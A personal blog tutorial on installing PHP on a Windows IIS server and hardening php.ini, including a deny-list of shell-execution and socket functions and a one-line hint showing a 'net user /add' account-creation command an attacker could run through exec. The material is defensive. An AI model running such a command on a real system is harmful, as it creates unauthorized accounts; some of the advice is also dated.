WinBlogs

Some techy stuff and occasional verbose ramblings :D

IIS server, Servers, Windows and Powershell

Setuping a server for web hosting – part 4: Installing PHP

Hello after a very long pause 🙂 . Continuing the “Setuping a server for web hosting” series with the new smashing video of how to install PHP on your machine! AWESOME right? 🙂

In the very begining of the post, lets learn what PHP is exactly.

So, Wikipedia says ( and I add that I agree with her 🙂 :

PHP: Hypertext Preprocessor is a widely used, general-purpose scripting language that was originally designed for web development to produce dynamic web pages. For this purpose, PHP code is embedded into the HTML source document and interpreted by a web server with a PHP processor module, which generates the web page document. As a general-purpose programming language, PHP code is processed by an interpreter application in command-line mode performing desired operating system operations and producing program output on its standard output channel. It may also function as a graphical application. PHP is available as a processor for most modern web servers and as standalone interpreter on most operating systems and computing platforms.

PHP was originally created by Rasmus Lerdorf in 1995 and has been in continuous development ever since. The main implementation of PHP is now produced by The PHP Group and serves as the de facto standard for PHP as there is no formal specification.PHP is free software released under the PHP License.

So, now when we know what PHP is, lets check the basic PHP syntax:

    <?php
        echo "Hello World";
       /* echo("Hello World"); works as well, although echo isn't a
        function (it's a language construct). In some cases, such
        as when multiple parameters are passed to echo, parameters
        cannot be enclosed in parentheses */
    ?>

You can find out more about the PHP project on www.php.net.

In this case, I will use Windows Web Platform Installer to install PHP on my machine. By going on this link you can use the installer to install PHP on your machine (same link is also used in the video).

Check out the video ( dont forget to put it in full screen mode 🙂 :

So, now when you’re all full of excitement and thinking “LOL, installing PHP is extra easy, everyone could do it” ….NAH!!! and the host says: You lost 🙂

First, lets check it the PHP is working at all on our server. Yes, we could use the above stated syntax, but that just isnt fun 🙂 . To get some detailed info on our PHP lets use this command:

    <?php phpinfo(); ?>

Lets navigate to c:\inetpub\wwwroot\ and create a file called “phptest.php” . We will do that by clicking with the right mouse click , New – Text Document.  We will call it phptest.php.

Inside the document we will paste the above piece of code, save it and hold your fingers 🙂 .

Point your browser to your server address, and to the phptest.php file.

If everything went smoothly you should see a page like this:

If you see the page that means that the PHP on our server is working properly.

Now, lets have some fun with security issues in PHP.

First of all, we have to check the php.ini file which is located in C:\Program Files (x86)\PHP\php.ini  . Lets open it with Notepad.

Most of the option are explained in the file itself, so we will skip them. Focus will be only on the most important ones.

One of the interesting lines is this :

    ; – magic_quotes_gpc = Off         [Performance]

As we can see, that option is commented out and DISABLED, and its best to leave it like that since its been deprecated in PHP 5.3.X .

Second option is:

    register_globals = Off –

LEAVE THAT TURNED OFF. If you have clients who have ancient applications, tell them to rewrite them 🙂 .  More about the discussion on using register globals can be found on this link

Third one that should be disabled is :

    allow_url_fopen = On

Standard setting in the instllation is “On”, which is bad and wrong for many reasons 🙂 . This setting should be turned of because of cross site scripting and security holes in lots of CMS/Forum scripts. When fopen is turned on, a potential attacker has an oportunity to use some security hole in your application to include his own file and gain access over your entire account. I really think you dont want that 🙂

But, never fear , alternative is here 🙂 .Tell your customers or yourself to use curl for fetching remote content.

Standard fopen function should be replaced with a curl function :

Fopen function

        <?
        $result = fopen($url,r);
        ?>
    

Curl function

    <?
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    $result = curl_exec($ch);
    curl_close($ch);
    ?>
    

Next very important setting is :

    disable_functions =

By standard, its empty…

Here are some of the most common functions to be disabled : system, exec, shell_exec, passthru, set_time_limit, error_log, ini_alter, dl, pfsockopen, openlog, syslog, readlink, symlink, link, leak, fsockopen, popen, escapeshellcmd, apache_child_terminate apache_get_modules, apache_get_version, apache_getenv, apache_note,apache_setenv,virtual

Google a bit to find what these functions do, but for an example, I would disable the “exec” command ( among others) , but you find out why 🙂
( hint : net user /add useraccountname mypassword )

When you’re done setting the php.ini file, all you need to do is restart IIS server and thats it.

Next step is to install some PHP based application and admire your work.

Ofcourse, this is a very fast tutorial on installing PHP . Configuration of it is the trickiest part and you should use the official php site and google to help you with it!

Cheers, Alesandro


system, exec, shell_exec, passthru, set_time_limit, error_log, ini_alter, dl, pfsockopen, openlog, syslog, readlink, symlink, link, leak, fsockopen, popen, escapeshellcmd, apache_child_terminate apache_get_modules, apache_get_version, apache_getenv, apache_note,apache_setenv,virtual

1 Comment

  1. Nevena

    Ohhhh, it’s great dude…Thank you for posting it – you saved my life… 😀

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Theme by Anders Norén